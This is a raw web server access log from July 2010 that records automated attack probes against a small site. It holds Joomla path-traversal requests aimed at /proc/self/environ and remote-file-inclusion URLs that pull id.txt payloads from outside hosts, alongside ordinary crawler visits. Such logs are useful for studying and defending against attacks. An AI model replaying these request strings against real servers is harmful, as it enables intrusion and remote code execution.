208.115.111.248 - - [01/Jul/2010:03:59:20 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
78.41.233.128 - - [01/Jul/2010:03:59:24 -0500] "GET /logs/access_log.1276473600//index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
78.41.233.128 - - [01/Jul/2010:03:59:27 -0500] "GET /logs/access_log.1276473600//index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
174.142.75.205 - - [01/Jul/2010:04:00:26 -0500] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://jspo.org/images/gallery/id.txt??? HTTP/1.1" 404 340 "-""libwww-perl/5.805"
174.142.75.205 - - [01/Jul/2010:04:00:26 -0500] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://jspo.org/images/gallery/id.txt??? HTTP/1.1" 404 335 "-""libwww-perl/5.805"
91.121.21.189 - - [01/Jul/2010:04:00:37 -0500] "GET /logs/access_log.1276473600//index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.803"
201.20.37.144 - - [01/Jul/2010:04:02:32 -0500] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.biegaj.isp.net.pl/portal/media/id.txt??? HTTP/1.1" 404 335 "-""libwww-perl/5.805"
201.20.37.144 - - [01/Jul/2010:04:02:32 -0500] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.biegaj.isp.net.pl/portal/media/id.txt??? HTTP/1.1" 404 340 "-""libwww-perl/5.805"
201.20.37.144 - - [01/Jul/2010:04:02:35 -0500] "GET /logs/access_log.1277164800//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.biegaj.isp.net.pl/portal/media/id.txt??? HTTP/1.1" 404 362 "-""libwww-perl/5.805"
60.50.160.28 - - [01/Jul/2010:04:03:58 -0500] "GET /logs/access_log.1275696000/?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.808"
60.50.160.28 - - [01/Jul/2010:04:03:59 -0500] "GET /?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.808"
60.50.160.28 - - [01/Jul/2010:04:04:03 -0500] "GET /logs/?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 11614 "-""libwww-perl/5.808"
174.142.75.205 - - [01/Jul/2010:04:06:28 -0500] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://jspo.org/images/gallery/id.txt??? HTTP/1.1" 404 340 "-""libwww-perl/5.805"
174.142.75.205 - - [01/Jul/2010:04:06:28 -0500] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://jspo.org/images/gallery/id.txt??? HTTP/1.1" 404 335 "-""libwww-perl/5.805"
174.142.75.205 - - [01/Jul/2010:04:06:28 -0500] "GET /logs/access_log.1276473600//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://jspo.org/images/gallery/id.txt??? HTTP/1.1" 404 362 "-""libwww-perl/5.805"
222.236.47.182 - - [01/Jul/2010:04:07:17 -0500] "GET /logs/access_log.1276041600//index.php?option=com_rd_download&view=download&cid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.79"
222.236.47.182 - - [01/Jul/2010:04:07:18 -0500] "GET //index.php?option=com_rd_download&view=download&cid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.79"
222.236.47.182 - - [01/Jul/2010:04:07:19 -0500] "GET /logs//index.php?option=com_rd_download&view=download&cid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.79"
67.195.112.180 - - [01/Jul/2010:04:08:19 -0500] "GET /logs/access_log.1208390400 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
201.20.37.144 - - [01/Jul/2010:04:11:16 -0500] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.biegaj.isp.net.pl/portal/media/id.txt??? HTTP/1.1" 404 335 "-""libwww-perl/5.805"
201.20.37.144 - - [01/Jul/2010:04:11:16 -0500] "GET /logs/access_log.1276041600//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.biegaj.isp.net.pl/portal/media/id.txt??? HTTP/1.1" 404 362 "-""libwww-perl/5.805"
201.20.37.144 - - [01/Jul/2010:04:11:16 -0500] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.biegaj.isp.net.pl/portal/media/id.txt??? HTTP/1.1" 404 340 "-""libwww-perl/5.805"
201.20.37.144 - - [01/Jul/2010:04:11:28 -0500] "GET /logs/access_log.1276732800//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.biegaj.isp.net.pl/portal/media/id.txt??? HTTP/1.1" 404 362 "-""libwww-perl/5.805"
201.20.37.144 - - [01/Jul/2010:04:12:36 -0500] "GET /logs/access_log.1276732800%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.biegaj.isp.net.pl/portal/media/id.txt??? HTTP/1.1" 404 363 "-""libwww-perl/5.805"
203.251.80.167 - - [01/Jul/2010:04:16:25 -0500] "GET /logs/access_log.1276041600//index.php?option=com_rd_download&view=download&cid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
203.251.80.167 - - [01/Jul/2010:04:16:26 -0500] "GET //index.php?option=com_rd_download&view=download&cid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
203.251.80.167 - - [01/Jul/2010:04:16:26 -0500] "GET /logs//index.php?option=com_rd_download&view=download&cid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
201.20.37.144 - - [01/Jul/2010:04:21:34 -0500] "GET /logs/access_log.1277164800//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.biegaj.isp.net.pl/portal/media/id.txt??? HTTP/1.1" 404 362 "-""libwww-perl/5.805"
201.20.37.144 - - [01/Jul/2010:04:21:34 -0500] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.biegaj.isp.net.pl/portal/media/id.txt??? HTTP/1.1" 404 340 "-""libwww-perl/5.805"
201.20.37.144 - - [01/Jul/2010:04:21:34 -0500] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.biegaj.isp.net.pl/portal/media/id.txt??? HTTP/1.1" 404 335 "-""libwww-perl/5.805"
201.20.37.144 - - [01/Jul/2010:04:23:03 -0500] "GET /logs/access_log.1275264000//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.biegaj.isp.net.pl/portal/media/id.txt??? HTTP/1.1" 404 362 "-""libwww-perl/5.805"
201.20.37.144 - - [01/Jul/2010:04:23:11 -0500] "GET /logs/access_log.1275264000%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.biegaj.isp.net.pl/portal/media/id.txt??? HTTP/1.1" 404 363 "-""libwww-perl/5.805"
67.195.112.180 - - [01/Jul/2010:04:23:30 -0500] "GET /logs/access_log.1215648000 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
194.65.225.58 - - [01/Jul/2010:04:23:32 -0500] "GET /logs/access_log.1274572800%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://recky.webs.com/id1.txt?? HTTP/1.1" 404 363 "-""Mozilla/5.0"
194.65.225.58 - - [01/Jul/2010:04:23:32 -0500] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://recky.webs.com/id1.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
194.65.225.58 - - [01/Jul/2010:04:23:32 -0500] "GET //components/com_joomlalib/standalone/stubjambo.php?baseDir=http://recky.webs.com/id1.txt?? HTTP/1.1" 404 334 "-""Mozilla/5.0"
194.65.225.58 - - [01/Jul/2010:04:23:52 -0500] "GET //components/com_joomlalib/standalone/stubjambo.php?baseDir=http://recky.webs.com/id1.txt?? HTTP/1.1" 404 334 "-""Mozilla/5.0"
194.65.225.58 - - [01/Jul/2010:04:23:52 -0500] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://recky.webs.com/id1.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
194.65.225.58 - - [01/Jul/2010:04:23:52 -0500] "GET /logs/access_log.1274572800%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://recky.webs.com/id1.txt?? HTTP/1.1" 404 363 "-""Mozilla/5.0"
69.80.227.231 - - [01/Jul/2010:04:24:08 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
69.80.227.231 - - [01/Jul/2010:04:24:08 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
69.80.227.231 - - [01/Jul/2010:04:24:08 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
69.80.227.231 - - [01/Jul/2010:04:24:08 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
69.80.227.231 - - [01/Jul/2010:04:24:08 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
69.80.227.231 - - [01/Jul/2010:04:24:08 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
69.80.227.231 - - [01/Jul/2010:04:24:08 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
69.80.227.231 - - [01/Jul/2010:04:24:08 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
69.80.227.231 - - [01/Jul/2010:04:24:08 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
69.80.227.231 - - [01/Jul/2010:04:24:09 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
69.80.227.231 - - [01/Jul/2010:04:24:09 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
69.80.227.231 - - [01/Jul/2010:04:24:09 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
69.80.227.231 - - [01/Jul/2010:04:24:09 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
69.80.227.231 - - [01/Jul/2010:04:24:09 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
69.80.227.231 - - [01/Jul/2010:04:24:09 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
69.80.227.231 - - [01/Jul/2010:04:24:09 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
69.80.227.231 - - [01/Jul/2010:04:24:09 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
69.80.227.231 - - [01/Jul/2010:04:24:09 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
67.195.112.180 - - [01/Jul/2010:04:27:06 -0500] "GET /logs/access_log.1222732800 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
194.65.225.58 - - [01/Jul/2010:04:27:30 -0500] "GET /logs/access_log.1274572800//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://recky.webs.com/id1.txt?? HTTP/1.1" 404 361 "-""Mozilla/5.0"
92.246.14.10 - - [01/Jul/2010:04:36:01 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
92.246.14.10 - - [01/Jul/2010:04:36:01 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
92.246.14.10 - - [01/Jul/2010:04:36:01 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
92.246.14.10 - - [01/Jul/2010:04:36:01 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
92.246.14.10 - - [01/Jul/2010:04:36:01 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
92.246.14.10 - - [01/Jul/2010:04:36:01 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
92.246.14.10 - - [01/Jul/2010:04:36:02 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
92.246.14.10 - - [01/Jul/2010:04:36:02 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
92.246.14.10 - - [01/Jul/2010:04:36:02 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
92.246.14.10 - - [01/Jul/2010:04:36:02 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
92.246.14.10 - - [01/Jul/2010:04:36:02 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
92.246.14.10 - - [01/Jul/2010:04:36:02 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
92.246.14.10 - - [01/Jul/2010:04:36:02 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
92.246.14.10 - - [01/Jul/2010:04:36:02 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
92.246.14.10 - - [01/Jul/2010:04:36:02 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
92.246.14.10 - - [01/Jul/2010:04:36:03 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
92.246.14.10 - - [01/Jul/2010:04:36:03 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
92.246.14.10 - - [01/Jul/2010:04:36:03 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
194.65.225.58 - - [01/Jul/2010:04:36:50 -0500] "GET /logs/access_log.1274572800//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://recky.webs.com/id1.txt?? HTTP/1.1" 404 361 "-""Mozilla/5.0"
193.252.118.175 - - [01/Jul/2010:04:38:07 -0500] "GET / HTTP/1.1" 200 1003 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.1) VoilaBot BETA 1.2 (support.voilabot@orange-ftgroup.com)"
208.115.111.248 - - [01/Jul/2010:04:40:15 -0500] "GET /costume/cd-page1.htm HTTP/1.1" 200 1189 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [01/Jul/2010:04:40:17 -0500] "GET /costume/shipping.htm HTTP/1.1" 404 304 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [01/Jul/2010:04:40:19 -0500] "GET /logs/access_log.1238112000 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [01/Jul/2010:04:40:21 -0500] "GET /logs/access_log.1238198400 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [01/Jul/2010:04:40:23 -0500] "GET /logs/access_log.1238284800 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [01/Jul/2010:04:40:25 -0500] "GET /logs/access_log.1238457600 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [01/Jul/2010:04:40:27 -0500] "GET /logs/access_log.1238544000 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [01/Jul/2010:04:40:29 -0500] "GET /logs/access_log.1238630400 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [01/Jul/2010:04:40:31 -0500] "GET /logs/access_log.1238716800 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [01/Jul/2010:04:40:33 -0500] "GET /logs/access_log.1238889600 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [01/Jul/2010:04:40:35 -0500] "GET /logs/access_log.1238976000 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [01/Jul/2010:04:40:37 -0500] "GET /logs/access_log.1239062400 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
67.195.112.180 - - [01/Jul/2010:04:45:09 -0500] "GET /logs/access_log.1207612800 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
89.200.170.145 - - [01/Jul/2010:04:47:00 -0500] "GET /*.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.813"
89.200.170.145 - - [01/Jul/2010:04:48:05 -0500] "GET /logs/*.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.813"
89.200.170.145 - - [01/Jul/2010:04:48:06 -0500] "GET /*.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.813"
67.195.112.180 - - [01/Jul/2010:04:48:17 -0500] "GET /logs/access_log.1187136000 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
89.200.170.145 - - [01/Jul/2010:04:48:38 -0500] "GET /logs/*.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.813"
89.200.170.145 - - [01/Jul/2010:04:48:38 -0500] "GET /*.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.813"
89.200.170.145 - - [01/Jul/2010:04:48:38 -0500] "GET /*.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.813"
89.200.170.145 - - [01/Jul/2010:04:49:19 -0500] "GET /*.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.813"
207.46.204.196 - - [01/Jul/2010:04:50:58 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
89.200.170.145 - - [01/Jul/2010:04:51:11 -0500] "GET /logs/access_log.1277424000/*.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 316 "-""libwww-perl/5.813"
89.200.170.145 - - [01/Jul/2010:04:51:12 -0500] "GET /*.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.813"
89.200.170.145 - - [01/Jul/2010:04:51:12 -0500] "GET /logs/*.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.813"
207.46.204.196 - - [01/Jul/2010:04:51:46 -0500] "GET /logs/access_log.1183248000 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
89.200.170.145 - - [01/Jul/2010:04:52:04 -0500] "GET /logs/*.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.813"
89.200.170.145 - - [01/Jul/2010:04:52:04 -0500] "GET /*.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.813"
89.200.170.145 - - [01/Jul/2010:04:52:21 -0500] "GET /*.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.813"
62.182.63.49 - - [01/Jul/2010:04:54:26 -0500] "GET /logs/access_log.1274832000//index.php?option=com_bfsurvey&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
62.182.63.49 - - [01/Jul/2010:04:54:26 -0500] "GET //index.php?option=com_bfsurvey&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
62.182.63.49 - - [01/Jul/2010:04:54:26 -0500] "GET /logs//index.php?option=com_bfsurvey&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
89.200.170.145 - - [01/Jul/2010:04:54:29 -0500] "GET /*.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.813"
201.20.37.144 - - [01/Jul/2010:04:55:46 -0500] "GET /logs/access_log.1277164800//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.biegaj.isp.net.pl/portal/media/id.txt??? HTTP/1.1" 404 362 "-""libwww-perl/5.805"
201.20.37.144 - - [01/Jul/2010:04:55:46 -0500] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.biegaj.isp.net.pl/portal/media/id.txt??? HTTP/1.1" 404 340 "-""libwww-perl/5.805"
201.20.37.144 - - [01/Jul/2010:04:55:46 -0500] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.biegaj.isp.net.pl/portal/media/id.txt??? HTTP/1.1" 404 335 "-""libwww-perl/5.805"
203.251.80.167 - - [01/Jul/2010:04:56:19 -0500] "GET /logs/access_log.1276041600//index.php?option=com_rd_download&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
203.251.80.167 - - [01/Jul/2010:04:56:19 -0500] "GET //index.php?option=com_rd_download&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
203.251.80.167 - - [01/Jul/2010:04:56:20 -0500] "GET /logs//index.php?option=com_rd_download&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
62.182.63.49 - - [01/Jul/2010:04:56:44 -0500] "GET /logs/access_log.1277164800//index.php?option=com_bfsurvey&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
62.182.63.49 - - [01/Jul/2010:04:56:45 -0500] "GET //index.php?option=com_bfsurvey&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
62.182.63.49 - - [01/Jul/2010:04:56:45 -0500] "GET /logs//index.php?option=com_bfsurvey&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
66.191.139.210 - - [01/Jul/2010:04:56:52 -0500] "GET /logs/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.yangsheng.ru/board/fx29id.txt? HTTP/1.1" 404 355 "-""Mozilla/5.0"
66.191.139.210 - - [01/Jul/2010:04:56:52 -0500] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.yangsheng.ru/board/fx29id.txt? HTTP/1.1" 404 350 "-""Mozilla/5.0"
66.191.139.210 - - [01/Jul/2010:04:56:52 -0500] "GET /logs/access_log.1274572800/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.yangsheng.ru/board/fx29id.txt? HTTP/1.1" 404 377 "-""Mozilla/5.0"
89.200.170.145 - - [01/Jul/2010:04:57:59 -0500] "GET /logs/*.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.813"
89.200.170.145 - - [01/Jul/2010:04:57:59 -0500] "GET /*.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.813"
121.78.118.123 - - [01/Jul/2010:04:58:35 -0500] "GET //index.php?option=com_bfsurvey&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
195.20.196.20 - - [01/Jul/2010:04:58:51 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
195.20.196.20 - - [01/Jul/2010:04:58:51 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
195.20.196.20 - - [01/Jul/2010:04:58:51 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
195.20.196.20 - - [01/Jul/2010:04:58:51 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
195.20.196.20 - - [01/Jul/2010:04:58:51 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
195.20.196.20 - - [01/Jul/2010:04:58:51 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
195.20.196.20 - - [01/Jul/2010:04:58:52 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
195.20.196.20 - - [01/Jul/2010:04:58:52 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
195.20.196.20 - - [01/Jul/2010:04:58:52 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
195.20.196.20 - - [01/Jul/2010:04:58:52 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
195.20.196.20 - - [01/Jul/2010:04:58:52 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
195.20.196.20 - - [01/Jul/2010:04:58:52 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
195.20.196.20 - - [01/Jul/2010:04:58:53 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
195.20.196.20 - - [01/Jul/2010:04:58:53 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
195.20.196.20 - - [01/Jul/2010:04:58:53 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
195.20.196.20 - - [01/Jul/2010:04:58:53 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
195.20.196.20 - - [01/Jul/2010:04:58:53 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
195.20.196.20 - - [01/Jul/2010:04:58:53 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
89.200.170.145 - - [01/Jul/2010:04:59:43 -0500] "GET /logs/access_log.1276041600/*.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 316 "-""libwww-perl/5.813"
89.200.170.145 - - [01/Jul/2010:04:59:43 -0500] "GET /*.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.813"
89.200.170.145 - - [01/Jul/2010:04:59:44 -0500] "GET /logs/*.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.813"
79.110.132.245 - - [01/Jul/2010:05:00:13 -0500] "GET //components/administrator/com_remository/admin.remository.php?mosConfig.absolute.path=http://www.fileden.com/files/2010/1/5/2714272/id1.txt? HTTP/1.1" 404 345 "-""Mozilla/5.0"
